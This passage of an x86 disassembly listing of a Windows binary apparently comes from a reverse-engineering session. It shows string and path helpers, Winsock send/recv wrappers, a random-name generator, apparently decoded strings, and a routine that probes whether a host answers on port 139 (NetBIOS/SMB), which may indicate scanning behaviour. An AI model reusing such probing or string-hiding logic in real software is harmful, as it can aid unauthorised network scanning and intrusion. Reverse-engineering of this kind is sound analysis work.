mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40EDC6
mov ecx, [esp+408h+var_4]
mov eax, 1
pop esi
call sub_4192B6
add esp, 404h
retn
sub_40EB90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EDF0 proc near ; CODE XREF: sub_409E30+105�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 14h
mov eax, dword_42A290
push edi
mov edi, [esp+18h+arg_0]
test edi, edi
mov [esp+18h+var_4], eax
jnz short loc_40EE15
xor eax, eax
pop edi
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40EE15: ; CODE XREF: sub_40EDF0+13�j
push esi
push 0
push 1
push 2
call dword_424260 ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EE7B
mov [esp+1Ch+var_14], eax
mov [esp+1Ch+var_10], eax
mov [esp+1Ch+var_C], eax
push edi
mov [esp+20h+var_8], eax
mov word ptr [esp+20h+var_14], 2
call dword_42424C ; inet_addr
push 8Bh
mov [esp+20h+var_10], eax
call dword_424264 ; htons
push 10h
lea ecx, [esp+20h+var_14]
push ecx
push esi
mov word ptr [esp+28h+var_14+2], ax
call dword_424268 ; connect
push esi
mov edi, eax
call dword_42426C ; closesocket
xor eax, eax
test edi, edi
setz al
loc_40EE7B: ; CODE XREF: sub_40EDF0+39�j
mov ecx, [esp+1Ch+var_4]
pop esi
pop edi
call sub_4192B6
add esp, 14h
retn
sub_40EDF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EE90 proc near ; CODE XREF: sub_405940+1C6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
jz short loc_40EEEB
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_40EEEB
mov edx, esi
sub edx, eax
loc_40EEA5: ; CODE XREF: sub_40EE90+1D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40EEA5
mov eax, esi
lea edx, [eax+1]
loc_40EEB4: ; CODE XREF: sub_40EE90+29�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40EEB4
sub eax, edx
lea eax, [eax+esi-1]
cmp eax, esi
jz short loc_40EEE1
loc_40EEC5: ; CODE XREF: sub_40EE90+44�j
mov cl, [eax]
cmp cl, 5Ch
jz short loc_40EEE0
cmp cl, 2Fh
jz short loc_40EEE0
dec eax
cmp eax, esi
jnz short loc_40EEC5
mov byte ptr [eax], 0
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EEE0: ; CODE XREF: sub_40EE90+3A�j
; sub_40EE90+3F�j
inc eax
loc_40EEE1: ; CODE XREF: sub_40EE90+33�j
mov byte ptr [eax], 0
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EEEB: ; CODE XREF: sub_40EE90+7�j
; sub_40EE90+F�j
xor eax, eax
pop esi
retn
sub_40EE90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EEF0 proc near ; CODE XREF: sub_4033F0+3B�p
; sub_403950+A6B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40EF47
mov edx, [esp+4+arg_4]
test edx, edx
jz short loc_40EF47
mov eax, esi
push edi
lea edi, [eax+1]
loc_40EF07: ; CODE XREF: sub_40EEF0+1C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40EF07
sub eax, edi
lea eax, [eax+esi-1]
cmp eax, esi
pop edi
jz short loc_40EF34
lea esp, [esp+0]
loc_40EF20: ; CODE XREF: sub_40EEF0+3F�j
mov cl, [eax]
cmp cl, 5Ch
jz short loc_40EF33
cmp cl, 2Fh
jz short loc_40EF33
dec eax
cmp eax, esi
jnz short loc_40EF20
jmp short loc_40EF34
; ---------------------------------------------------------------------------
loc_40EF33: ; CODE XREF: sub_40EEF0+35�j
; sub_40EEF0+3A�j
inc eax
loc_40EF34: ; CODE XREF: sub_40EEF0+27�j
; sub_40EEF0+41�j
sub edx, eax
loc_40EF36: ; CODE XREF: sub_40EEF0+4E�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40EF36
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EF47: ; CODE XREF: sub_40EEF0+7�j
; sub_40EEF0+F�j
xor eax, eax
pop esi
retn
sub_40EEF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EF50 proc near ; CODE XREF: sub_4030C0+47�p
; sub_4033F0+49�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
push edi
jz short loc_40EFB8
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40EFB8
push 8
push offset dword_429F48
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_4199F0
add esp, 8
test eax, eax
jz short loc_40EF84
add esi, 7
loc_40EF84: ; CODE XREF: sub_40EF50+2F�j
mov al, [esi]
test al, al
jz short loc_40EFA0
lea ebx, [ebx+0]
loc_40EF90: ; CODE XREF: sub_40EF50+4E�j
cmp al, 5Ch
jz short loc_40EFA0
cmp al, 2Fh
jz short loc_40EFA0
mov al, [esi+1]
inc esi
test al, al
jnz short loc_40EF90
loc_40EFA0: ; CODE XREF: sub_40EF50+38�j
; sub_40EF50+42�j ...
mov edx, edi
mov eax, esi
sub edx, esi
loc_40EFA6: ; CODE XREF: sub_40EF50+5E�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40EFA6
pop edi
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EFB8: ; CODE XREF: sub_40EF50+8�j
; sub_40EF50+10�j
pop edi
xor eax, eax
pop esi
retn
sub_40EF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40EFC0 proc near ; CODE XREF: sub_4030C0+55�p
; sub_4033F0+57�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push edi
mov edi, [esp+8+arg_0]
test edi, edi
jz short loc_40F02A
mov ebx, [esp+8+arg_4]
test ebx, ebx
jz short loc_40F02A
push esi
push 8
push offset dword_429F50
mov ecx, offset off_42AE60
mov esi, edi
call sub_406AE0
push eax
push edi
call sub_4199F0
add esp, 8
test eax, eax
jz short loc_40EFF9
lea esi, [edi+7]
mov edi, esi
loc_40EFF9: ; CODE XREF: sub_40EFC0+32�j
mov al, [esi]
test al, al
jz short loc_40F010
nop
loc_40F000: ; CODE XREF: sub_40EFC0+4E�j
cmp al, 5Ch
jz short loc_40F010
cmp al, 2Fh
jz short loc_40F010
mov al, [esi+1]
inc esi
test al, al
jnz short loc_40F000
loc_40F010: ; CODE XREF: sub_40EFC0+3D�j
; sub_40EFC0+42�j ...
sub esi, edi
push esi
push edi
push ebx
call sub_4198C0
add esp, 0Ch
mov byte ptr [esi+ebx], 0
pop esi
pop edi
mov eax, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F02A: ; CODE XREF: sub_40EFC0+8�j
; sub_40EFC0+10�j
pop edi
xor eax, eax
pop ebx
retn
sub_40EFC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F030 proc near ; CODE XREF: sub_407640+120�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40F03D
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F03D: ; CODE XREF: sub_40F030+7�j
push ebx
mov ebx, [esp+8+arg_4]
test ebx, ebx
jz short loc_40F049
mov byte ptr [ebx], 0
loc_40F049: ; CODE XREF: sub_40F030+14�j
mov ecx, [esp+8+arg_8]
test ecx, ecx
jz short loc_40F054
mov byte ptr [ecx], 0
loc_40F054: ; CODE XREF: sub_40F030+1F�j
mov al, [esi]
test al, al
mov edx, esi
jz short loc_40F071
lea esp, [esp+0]
loc_40F060: ; CODE XREF: sub_40F030+3A�j
cmp al, 40h
jz short loc_40F071
mov al, [edx+1]
inc edx
test al, al
jnz short loc_40F060
pop ebx
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F071: ; CODE XREF: sub_40F030+2A�j
; sub_40F030+32�j
cmp byte ptr [edx], 0
jnz short loc_40F07B
pop ebx
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F07B: ; CODE XREF: sub_40F030+44�j
test ebx, ebx
jz short loc_40F0A1
mov eax, edx
sub eax, esi
push ebp
push edi
mov ecx, eax
mov ebp, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
mov ecx, [esp+10h+arg_8]
pop edi
mov byte ptr [eax+ebx], 0
pop ebp
loc_40F0A1: ; CODE XREF: sub_40F030+4D�j
test ecx, ecx
jz short loc_40F0BA
lea eax, [edx+1]
mov edx, ecx
sub edx, eax
lea esp, [esp+0]
loc_40F0B0: ; CODE XREF: sub_40F030+88�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40F0B0
loc_40F0BA: ; CODE XREF: sub_40F030+73�j
pop ebx
mov eax, 1
pop esi
retn
sub_40F030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F0D0 proc near ; CODE XREF: sub_401FC0+D9�p
; sub_401FC0+102�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
jnz short loc_40F0DD
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F0DD: ; CODE XREF: sub_40F0D0+7�j
dec esi
mov ecx, [esp+4+arg_0]
mov edx, [esp+4+arg_4]
jz short loc_40F0F7
loc_40F0E8: ; CODE XREF: sub_40F0D0+25�j
mov al, [ecx]
test al, al
jz short loc_40F0F7
cmp al, [edx]
jnz short loc_40F0F7
inc ecx
inc edx
dec esi
jnz short loc_40F0E8
loc_40F0F7: ; CODE XREF: sub_40F0D0+16�j
; sub_40F0D0+1C�j ...
movzx eax, byte ptr [ecx]
movzx ecx, byte ptr [edx]
sub eax, ecx
pop esi
retn
sub_40F0D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F110 proc near ; CODE XREF: sub_407640+162�p
; sub_407640+5AE�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
test edx, edx
jnz short loc_40F11E
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40F11E: ; CODE XREF: sub_40F110+6�j
mov cl, [edx]
push esi
push edi
xor edi, edi
test cl, cl
jz short loc_40F160
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
mov dl, 2Eh
loc_40F132: ; CODE XREF: sub_40F110+42�j
cmp cl, dl
jnz short loc_40F14D
lea ecx, [esi+eax]
test ecx, ecx
jle short loc_40F160
mov cl, [eax]
test cl, cl
jz short loc_40F160
cmp cl, dl
jz short loc_40F160
cmp [eax-2], dl
jz short loc_40F160
inc edi
loc_40F14D: ; CODE XREF: sub_40F110+24�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F132
test edi, edi
jz short loc_40F160
pop edi
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F110+16�j
; sub_40F110+2B�j ...
pop edi
xor eax, eax
pop esi
retn
sub_40F110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F170 proc near ; CODE XREF: sub_405940+2E0�p
; sub_40B1E0+1FA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
mov ebp, [esp+8+arg_4]
push esi
mov ecx, ebp
mov edx, ecx
shr ecx, 2
push edi
xor eax, eax
mov edi, ebx
rep stosd
mov ecx, edx
and ecx, 3
xor esi, esi
test ebp, ebp
rep stosb
jle short loc_40F1D3
loc_40F196: ; CODE XREF: sub_40F170+61�j
call sub_419853
and eax, 80000001h
jns short loc_40F1A7
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_40F1A7: ; CODE XREF: sub_40F170+30�j
jnz short loc_40F1BB
call sub_419853
cdq
mov ecx, 1Ah
idiv ecx
add dl, 61h
jmp short loc_40F1CB
; ---------------------------------------------------------------------------
loc_40F1BB: ; CODE XREF: sub_40F170:loc_40F1A7�j
call sub_419853
cdq
mov ecx, 1Ah
idiv ecx
add dl, 41h
loc_40F1CB: ; CODE XREF: sub_40F170+49�j
mov [esi+ebx], dl
inc esi
cmp esi, ebp
jl short loc_40F196
loc_40F1D3: ; CODE XREF: sub_40F170+24�j
pop edi
mov byte ptr [esi+ebx], 0
pop esi
pop ebp
pop ebx
retn
sub_40F170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F1E0 proc near ; CODE XREF: sub_4105E0+20�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
xor eax, eax
mov ecx, esi
mov [ecx], eax
mov [ecx+4], eax
push edi
mov edi, [esp+8+arg_0]
mov [ecx+8], eax
mov [ecx+0Ch], eax
push edi
mov word ptr [esi], 2
call dword_42424C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [esi+4], eax
jnz short loc_40F222
push edi
call dword_42427C ; gethostbyname
test eax, eax
jz short loc_40F23B
mov edx, [eax+0Ch]
mov eax, [edx]
mov ecx, [eax]
mov [esi+4], ecx
loc_40F222: ; CODE XREF: sub_40F1E0+2B�j
mov edx, [esp+8+arg_4]
push edx
call dword_424264 ; htons
mov [esi+2], ax
pop edi
mov eax, 1
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_40F23B: ; CODE XREF: sub_40F1E0+36�j
push 2726h
call dword_424250 ; WSASetLastError
pop edi
xor eax, eax
pop esi
retn 0Ch
sub_40F1E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F250 proc near ; CODE XREF: sub_411360+678�p
; sub_411360+72D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_40F25B
retn 4
; ---------------------------------------------------------------------------
loc_40F25B: ; CODE XREF: sub_40F250+6�j
mov edx, [eax+8]
test edx, edx
jz short loc_40F299
push edi
mov edi, [eax+4]
mov [edx+4], edi
mov edx, [eax+4]
test edx, edx
pop edi
jz short loc_40F285
mov eax, [eax+8]
mov [edx+8], eax
mov edx, [ecx+0Ch]
mov [ecx+18h], edx
mov eax, 1
retn 4
; ---------------------------------------------------------------------------
loc_40F285: ; CODE XREF: sub_40F250+1F�j
mov edx, [eax+8]
mov [ecx+10h], edx
mov edx, [ecx+0Ch]
mov [ecx+18h], edx
mov eax, 1
retn 4
; ---------------------------------------------------------------------------
loc_40F299: ; CODE XREF: sub_40F250+10�j
mov edx, [eax+4]
test edx, edx
jz short loc_40F2BA
mov dword ptr [edx+8], 0
mov eax, [eax+4]
mov edx, eax
mov [ecx+0Ch], eax
mov [ecx+18h], edx
mov eax, 1
retn 4
; ---------------------------------------------------------------------------
loc_40F2BA: ; CODE XREF: sub_40F250+4E�j
mov dword ptr [ecx+0Ch], 0
mov edx, [ecx+0Ch]
mov dword ptr [ecx+10h], 0
mov [ecx+18h], edx
mov eax, 1
retn 4
sub_40F250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F2E0 proc near ; CODE XREF: sub_4110E0+10E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_40F3B0
push eax
mov large fs:0, esp
sub esp, 0Ch
push esi
push edi
mov edi, ecx
mov eax, [edi+4]
cmp eax, 0FFFFFFFFh
jz short loc_40F329
push 0
push 2
lea ecx, [esp+28h+var_14]
push ecx
push eax
call dword_42425C ; recv
mov esi, eax
call dword_424240 ; WSAGetLastError
cmp esi, 0FFFFFFFFh
mov [edi+8], eax
jz short loc_40F329
cmp esi, 2
jz short loc_40F389
loc_40F329: ; CODE XREF: sub_40F2E0+22�j
; sub_40F2E0+42�j
push 30Ch
call sub_4191C1
mov esi, eax
add esp, 4
mov [esp+20h+var_10], esi
test esi, esi
mov [esp+20h+var_4], 0
jz short loc_40F36C
call dword_42412C ; RtlGetLastWin32Error
push eax
push 1Eh
push offset dword_4292F4
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_407090
add esp, 0Ch
jmp short loc_40F36E
; ---------------------------------------------------------------------------
loc_40F36C: ; CODE XREF: sub_40F2E0+66�j
xor eax, eax
loc_40F36E: ; CODE XREF: sub_40F2E0+8A�j
push offset dword_4264B4
lea edx, [esp+24h+var_18]
push edx
mov [esp+28h+var_4], 0FFFFFFFFh
mov [esp+28h+var_18], eax
call sub_41A2B3
loc_40F389: ; CODE XREF: sub_40F2E0+47�j
mov eax, [esp+20h+var_14]
push eax
call dword_424234 ; htons
mov ecx, [esp+20h+var_C]
pop edi
pop esi
mov large fs:0, ecx
add esp, 18h
retn
sub_40F2E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F3B0 proc near ; CODE XREF: sub_4110E0+F2�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_40F3B0
push eax
mov eax, [esp+0Ch+arg_0]
mov large fs:0, esp
sub esp, 8
push esi
push eax
mov esi, ecx
call dword_424264 ; htons
mov edx, [esi+4]
push 0
push 2
lea ecx, [esp+20h+arg_0]
push ecx
push edx
mov [esp+28h+arg_0], eax
call dword_424274 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40F3FD
call dword_424240 ; WSAGetLastError
mov [esi+8], eax
jmp short loc_40F402
; ---------------------------------------------------------------------------
loc_40F3FD: ; CODE XREF: sub_40F3B0+40�j
cmp eax, 2
jz short loc_40F462
loc_40F402: ; CODE XREF: sub_40F3B0+4B�j
push 30Ch
call sub_4191C1
mov esi, eax
add esp, 4
mov [esp+18h+var_10], esi
test esi, esi
mov [esp+18h+var_4], 0
jz short loc_40F445
call dword_42412C ; RtlGetLastWin32Error
push eax
push 1Eh
push offset dword_429354
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_407090
add esp, 0Ch
jmp short loc_40F447
; ---------------------------------------------------------------------------
loc_40F445: ; CODE XREF: sub_40F3B0+6F�j
xor eax, eax
loc_40F447: ; CODE XREF: sub_40F3B0+93�j
mov [esp+18h+var_14], eax
push offset dword_4264B4
lea eax, [esp+1Ch+var_14]
push eax
mov [esp+20h+var_4], 0FFFFFFFFh
call sub_41A2B3
loc_40F462: ; CODE XREF: sub_40F3B0+50�j
mov ecx, [esp+18h+var_C]
pop esi
mov large fs:0, ecx
add esp, 14h
retn 4
sub_40F3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F480 proc near ; CODE XREF: sub_4110E0+107�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_4106A0
push eax
mov eax, [esp+0Ch+arg_0]
mov large fs:0, esp
push esi
push edi
mov edi, [esp+14h+arg_4]
push 0
push edi
mov esi, ecx
mov ecx, [esi+4]
push eax
push ecx
call dword_424274 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40F4C0
call dword_424240 ; WSAGetLastError
mov [esi+8], eax
or eax, 0FFFFFFFFh
loc_40F4C0: ; CODE XREF: sub_40F480+32�j
cmp eax, edi
jz short loc_40F524
push 30Ch
call sub_4191C1
mov esi, eax
add esp, 4
mov [esp+14h+arg_0], esi
test esi, esi
mov [esp+14h+var_4], 0
jz short loc_40F507
call dword_42412C ; RtlGetLastWin32Error
push eax
push 1Eh
push offset dword_429394
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_407090
add esp, 0Ch
jmp short loc_40F509
; ---------------------------------------------------------------------------
loc_40F507: ; CODE XREF: sub_40F480+61�j
xor eax, eax
loc_40F509: ; CODE XREF: sub_40F480+85�j
push offset dword_4264B4
lea edx, [esp+18h+arg_4]
push edx
mov [esp+1Ch+var_4], 0FFFFFFFFh
mov [esp+1Ch+arg_4], eax
call sub_41A2B3
loc_40F524: ; CODE XREF: sub_40F480+42�j
mov ecx, [esp+14h+var_C]
pop edi
mov large fs:0, ecx
pop esi
add esp, 0Ch
retn 8
sub_40F480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F540 proc near ; CODE XREF: sub_4110E0+15B�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_4106A0
push eax
mov large fs:0, esp
push ebx
mov ebx, [esp+10h+arg_4]
push esi
mov esi, ecx
mov eax, [esi+4]
cmp eax, 0FFFFFFFFh
push edi
jz short loc_40F585
mov ecx, [esp+18h+arg_0]
push 0
push ebx
push ecx
push eax
call dword_42425C ; recv
mov edi, eax
call dword_424240 ; WSAGetLastError
cmp edi, 0FFFFFFFFh
mov [esi+8], eax
jnz short loc_40F588
loc_40F585: ; CODE XREF: sub_40F540+24�j
or edi, 0FFFFFFFFh
loc_40F588: ; CODE XREF: sub_40F540+43�j
cmp edi, ebx
jz short loc_40F5EC
push 30Ch
call sub_4191C1
mov esi, eax
add esp, 4
mov [esp+18h+arg_0], esi
test esi, esi
mov [esp+18h+var_4], 0
jz short loc_40F5CF
call dword_42412C ; RtlGetLastWin32Error
push eax
push 1Eh
push offset dword_4293B4
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_407090
add esp, 0Ch
jmp short loc_40F5D1
; ---------------------------------------------------------------------------
loc_40F5CF: ; CODE XREF: sub_40F540+69�j
xor eax, eax
loc_40F5D1: ; CODE XREF: sub_40F540+8D�j
push offset dword_4264B4
lea edx, [esp+1Ch+arg_4]
push edx
mov [esp+20h+var_4], 0FFFFFFFFh
mov [esp+20h+arg_4], eax
call sub_41A2B3
loc_40F5EC: ; CODE XREF: sub_40F540+4A�j
mov ecx, [esp+18h+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
add esp, 0Ch
retn 8
sub_40F540 endp
; =============== S U B R O U T I N E =======================================
sub_40F600 proc near ; CODE XREF: sub_40F670+17�p
; sub_410BA0+9B�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ebx, ecx
mov ecx, [ebx+10h]
cdq
idiv ecx
push ebp
mov ebp, eax
inc ebp
imul ebp, ecx
push ebp
call sub_4191BC
add esp, 4
test eax, eax
mov [esp+8+arg_0], eax
jnz short loc_40F62A
pop ebp
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_40F62A: ; CODE XREF: sub_40F600+23�j
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40F658
push esi
mov esi, [ebx+4]
push edi
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebx+4]
push ecx
call sub_4198AE
mov eax, [esp+14h+arg_0]
add esp, 4
pop edi
pop esi
loc_40F658: ; CODE XREF: sub_40F600+2F�j
mov [ebx+8], ebp
mov [ebx+4], eax
pop ebp
mov eax, 1
pop ebx
retn 4
sub_40F600 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F670 proc near ; CODE XREF: sub_410810+4C�p
; sub_410810+67�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, ecx
mov eax, [ebx+0Ch]
mov ecx, [ebx+8]
push ebp
mov ebp, [esp+8+arg_4]
add eax, ebp
cmp eax, ecx
jle short loc_40F695
push eax
mov ecx, ebx
call sub_40F600
test eax, eax
jnz short loc_40F695
pop ebp
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_40F695: ; CODE XREF: sub_40F670+12�j
; sub_40F670+1E�j
mov edx, [ebx+0Ch]
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, [ebx+4]
add edi, edx
mov ecx, ebp
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebx+0Ch]
pop edi
add eax, ebp
pop esi
mov [ebx+0Ch], eax
pop ebp
mov eax, 1
pop ebx
retn 8
sub_40F670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F6D0 proc near ; CODE XREF: sub_40FA30+9�p
; sub_40FC50+8�p ...
arg_0 = dword ptr 4
push ebx
mov eax, ecx
push esi
mov esi, [esp+8+arg_0]
lea edx, [esi+4]
lea ecx, [eax+4]
mov dword ptr [eax], offset off_424534
sub ecx, edx
loc_40F6E6: ; CODE XREF: sub_40F6D0+1E�j
mov bl, [edx]
mov [ecx+edx], bl
inc edx
test bl, bl
jnz short loc_40F6E6
mov cx, [esi+104h]
mov [eax+104h], cx
mov dx, [esi+106h]
mov [eax+106h], dx
mov ecx, [esi+108h]
mov [eax+108h], ecx
mov dx, [esi+10Ch]
pop esi
mov [eax+10Ch], dx
pop ebx
retn 4
sub_40F6D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F730 proc near ; CODE XREF: sub_40FA60+3C�p
; sub_40FCA0+34�p ...
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
mov ebx, ecx
push 80h
mov [esp+18h+var_4], ebx
call sub_4191BC
add esp, 4
push 6
push offset dword_4288BC
mov ecx, offset off_42AE60
mov ebp, eax
call sub_406AE0
mov edx, ebp
lea ecx, [ecx+0]
loc_40F760: ; CODE XREF: sub_40F730+38�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40F760
lea eax, [ebx+4]
mov edx, eax
nop
loc_40F770: ; CODE XREF: sub_40F730+45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F770
mov edi, ebp
sub eax, edx
dec edi
lea esp, [esp+0]
loc_40F780: ; CODE XREF: sub_40F730+56�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40F780
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebp
dec edi
jmp short loc_40F7A0
; ---------------------------------------------------------------------------
align 10h
loc_40F7A0: ; CODE XREF: sub_40F730+6B�j
; sub_40F730+76�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40F7A0
mov ax, word_424544
push 5
push offset dword_4288C4
mov ecx, offset off_42AE60
mov [edi], ax
call sub_406AE0
mov esi, eax
loc_40F7C4: ; CODE XREF: sub_40F730+99�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F7C4
mov edi, ebp
sub eax, esi
dec edi
loc_40F7D0: ; CODE XREF: sub_40F730+A6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40F7D0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebx+108h]
push 20h
call sub_4191BC
push esi
mov ebx, eax
push offset dword_4243F0
push ebx
call sub_419B8A
mov eax, ebx
add esp, 10h
mov esi, eax
loc_40F808: ; CODE XREF: sub_40F730+DD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F808
mov edi, ebp
sub eax, esi
dec edi
loc_40F814: ; CODE XREF: sub_40F730+EA�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40F814
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push ebx
rep movsb
call sub_4198AE
mov edi, ebp
add esp, 4
dec edi
loc_40F836: ; CODE XREF: sub_40F730+10C�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40F836
mov cx, word_424544
push 6
mov [edi], cx
push offset dword_4288CC
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
jmp short loc_40F860
; ---------------------------------------------------------------------------
align 10h
loc_40F860: ; CODE XREF: sub_40F730+12B�j
; sub_40F730+135�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F860
mov edi, ebp
sub eax, esi
dec edi
lea esp, [esp+0]
loc_40F870: ; CODE XREF: sub_40F730+146�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40F870
mov edx, [esp+14h+var_4]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx esi, word ptr [edx+104h]
push 20h
call sub_4191BC
push esi
mov ebx, eax
push offset dword_4243F0
push ebx
call sub_419B8A
mov eax, ebx
add esp, 10h
mov esi, eax
lea ecx, [ecx+0]
loc_40F8B0: ; CODE XREF: sub_40F730+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F8B0
mov edi, ebp
sub eax, esi
dec edi
lea esp, [esp+0]
loc_40F8C0: ; CODE XREF: sub_40F730+196�j
mov cl, [edi+1]
inc edi
test cl, cl
